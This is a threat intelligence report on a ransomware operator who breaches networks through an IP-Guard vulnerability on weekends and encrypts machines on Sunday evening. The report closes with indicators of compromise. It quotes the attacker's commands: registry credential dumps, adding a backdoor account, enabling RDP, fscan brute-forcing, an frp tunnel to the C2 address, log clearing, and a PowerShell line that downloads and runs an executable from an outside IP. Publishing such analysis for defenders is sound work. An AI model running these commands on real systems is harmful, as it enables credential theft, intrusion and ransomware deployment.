Overview
QiAnXin Threat Intelligence Center has observed a diligent domestic ransomware operator, mainly active during weekends, able to physically bypass security personnel's detection of alerts. On Saturdays, they utilize various Nday vulnerabilities for intrusion, conduct continuous internal information gathering, assess the number of controlled machines, and on Sunday evenings, they deploy ransomware trojans in bulk to provide a "surprise" for the victims returning to work the next day. The tools predominantly used for lateral movement include Cobalt Strike, fscan, frp, and ransomware delivery packages, exhibiting a high similarity to the tactics employed by domestic red teams during penetration testing.
In the final part of the article, we will analyze the entire timeline of activities related to the IP-Guard vulnerability from the perspective of our own data, revealing the current intense state of attack and defense confrontation and presenting our views on vulnerability management in the field.
Review of Typical Penetration Attack Process
The attacker exploits the IP-Guard vulnerability to upload a webshell and then begins collecting local machine information. They execute the following commands via the webshell:
| - |
|---|
| Command |
| net user |
| tasklist |
| dir |
| save hklm\system system.zip |
| save hklm\SAM |
| net1 user audit Aa123456 /add |
| REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f |
The attacker first collects local machine information, retrieves account passwords (hHash), adds users, and attempts RDP remote login. They then deliver a Cobalt Strike Trojan named b.exe in the %UserProfile% directory, which, upon execution, injects shellcode into the lsass.exe process. Command and Control (C2): 38.46.8.218:55324. Using Cobalt Strike, the attacker delivers the following files in the same directory. Some of these tools triggered alerts from Tianqing due to antivirus detection, prompting the attacker to quickly replace them with other undetected tools to continue their "work" during the weekend. Basic activity operations are as follows:
| - | - |
|---|---|
| Released File | Function |
| fscan64.exe | Scanner |
| adduser.exe | Adds user |
| f.exe | Frp |
Launches fscan to perform brute-force attacks on servers within the same C segment using passwords captured from servers, targeting RDP, SSH, SMB, MSSQL, etc.
| - |
|---|
| Command |
| fscan64.exe -silent -h 10.XX.X.X/16 -pa 3389 -o 16.txt -pwda XXXX |
| fscan64.exe -silent -h 10.XX.X.X/24 -m ssh -no -pwda XXXX |
| fscan64.exe -h 10.XX.X.X/24 -m mssql -pwd XXXXX -o mssql.txt -silent |
| fscan64 -h 10.XX.X.X/24 -m smb2 -hash XXXX7119 -username administrator |
Starts frp to enable reverse proxy.
| - |
|---|
| Command |
| f.exe -t 38.46.8.218 -p 7000 |
Finally, clears the system's PS logs.
| - |
|---|
| Command |
| wevtutil cl "Windows PowerShell" |
After brute-forcing, the attacker discovered that they could log into more than a dozen machines within the same C segment using the plaintext passwords and hHash they had obtained. Finally, on Sunday evening, they chose to use Cobalt Strike to mass-deliver the ransomware payload windows_encryptor_471820908140_self_contained.exe. Upon execution, the self-contained file will release the LIVE ransomware encryption program named systime.exe in the %UserProfile% directory.
The Cobalt Strike used in the attack traced back to a domain (yangaoqing.com) through IP reverse lookup. Before the intrusion, the attacker appears to have changed the resolved IP.
| - | - |
|---|---|
| Timestamp | Associated IP |
| 2023-01-17~2023-10-09 | 39.97.108.148 (Beijing Alibaba Cloud) |
| 2023-10-09~2024-01-18 | 38.46.8.218 (United States) |
Unveiling the Covert Timeline of the IP-Guard Vulnerability from the Terminal Perspective
In our terminal data view of QiAnXin Threat Intelligence, as early as September 2023, we observed large-scale testing of the IP-Guard vulnerability, with several important governmental and enterprise entities being breached. At that time, the attackers only executed the whoami command. The initial judgment was that security researchers had discovered a 0day and were conducting tests. Then, after the vulnerability advisory was released through a vendor's bug bounty program on November 8th (without providing POC), on November 9th, we observed black-market actors using the IP-Guard vulnerability for batch web attacks. The corresponding command lines are as follows:
| - |
|---|
| Command |
| powershell -executionpolicybypass -noprofile -windowstylehidden (new-object system.net.webclient).downloadfile('http://154.12.57.238:7845/svdcx.exe','svdcx.exe');start-process svdcx.exe" |
In this wave, the attackers delivered domestically developed Trojans such as ghoost and gray pigeon, which are not suitable for lateral movement. Therefore, this wave of attacks did not cause direct and significant damage. The attacks persisted until the end of November. Subsequently, China Telecom Security published the Mallox ransomware report [1], which mentioned the exploitation of the IP-Guard vulnerability by ransomware groups on December 1st.
The above phenomena are not isolated cases. In our Threat Intelligence Center, we have observed that several web-layer vulnerabilities can be detected immediately after the release of security advisories. There are only two possible explanations for such a short interval: 1) Black-market actors quickly find and exploit vulnerabilities themselves by analyzing patches, or 2) security researchers report undisclosed vulnerabilities through bug bounty programs and then immediately sell them to black-market actors. The possibility of the latter cannot be ruled out. It is the duty and responsibility of all security vendors to prevent such incidents and create a healthy network environment.
Conclusion
Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including QiAnXin Threat Intelligence Platform (TIP), Tianqing, Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Threat Perception, support precise detection of such attacks.
IOC
38.46.8.218:7000
38.46.8.218:55324
yangaoqing.com
Reference Links
[1]. https://mp.weixin.qq.com/s/0b08HNOWW61DKGA0xwLxSw